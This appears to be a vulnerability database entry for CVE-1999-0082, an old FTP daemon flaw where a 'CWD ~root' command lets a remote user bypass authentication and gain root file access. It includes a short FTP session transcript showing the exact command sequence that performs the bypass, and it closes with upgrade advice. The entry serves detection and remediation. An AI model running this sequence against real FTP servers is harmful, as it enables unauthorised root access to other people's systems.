Korean
<< Back
VID 16037
Severity 40
Port 21
Protocol TCP
Class FTP
Detailed Description CWD ~root command in the FTP server allows root access. Very old versions of the FTP daemon may allow remote users to unauthorized access by using of the "CWD ~root" command. By issuing a sequence of commands including the "CWD ~root" command, an attacker could bypass authentication on a vulnerable FTP server to gain root permissions and and access arbitrary files outside of the FTP root directory with root privilege.
While looking at ftp, you can check for an older bug that was once widely exploited:

% ftp -n
ftp> open victim.com
Connected to victim.com
220 victim.com FTP server ready.
ftp> quote user ftp
331 Guest login ok, send ident as password.
ftp> quote cwd ~root
530 Please login with USER and PASS.
ftp> quote pass ftp@
230 Guest login ok, access restrictions apply.
ftp> ls -al / (or whatever)

* Platforms Affected:
FTP Any version

* References:
http://www.iss.net/security_center/static/54.php
http://www.alw.nih.gov/Security/Docs/admin-guide-to-cracking.101.html
Recommendation Replace the vulnerable FTP daemon with a more recent FTP package.

Also, FTP daemons that are vulnerable to this attack are likely to have shipped with older operating systems. Consider upgrading to the latest available operating system supported by your hardware.
Related URL CVE-1999-0082 (CVE)
Related URL (SecurityFocus)
Related URL (ISS)